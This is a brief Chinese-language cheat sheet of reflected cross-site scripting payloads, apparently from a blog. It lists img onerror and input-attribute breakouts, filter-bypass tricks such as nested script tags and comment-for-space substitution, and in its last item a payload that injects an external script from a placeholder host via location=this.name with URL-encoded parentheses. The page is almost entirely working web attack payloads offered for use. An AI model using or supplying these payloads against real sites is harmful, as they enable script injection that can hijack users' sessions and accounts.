1、常用脚本
<img src=x o<x>nerror=a<x>lert(/xss/)>
"/>
<script>alert(1)</script>
"><script src=www.baidu.com>
<img src=x onerror=prompt(1);>
<img src="x" onclick="alert(1)"> (点击)
<img/**/src=1 onerror=confirm(1)>
<img src=# onerror=confirm(1)> 或/>
<img src=1 onerror=console.log(alert(1));//
在<input>标签中可尝试如下脚本
xxxxx" onmouseover="alert(123)"
xxxxx" onFocus="alert(1)"
xxxxx" onClick="alert(1)">
xxxxx");alert(1);// (当参数在<script></script>之间时,此脚本可有效,注意闭合前面的括号等)
2、关键字过滤<script>,onerror
改为<scr<script>ipt>,oneonerrorrror
3、部分反射型xss存在于title中,可闭合</title>
如:https://www.cnblogs.com/superye/p/7343676.html?utm_source=itdadao&utm_medium=referral
4、空格被编码或过滤时,可使用/**/或<>变相伪造成空格
5、<input>中过滤了<>,(),''
构造本地payload:
xxxxxxxxxx" name=javasCript:alert%281%29 autofocus onfocus=location=this.name xx
构造payload获取:
xxxxxxxxxx" name=javasCript:s=document.createElement%28"sCript"%29;s.src="//xxxxx.js";document.body.appendChild%28s%29 autofocus onfocus=location=this.name xx
其中%28 %29为()的URL编码,参考:https://xsspt.com/index.php?do=binfo&id=2016-0195079
网友评论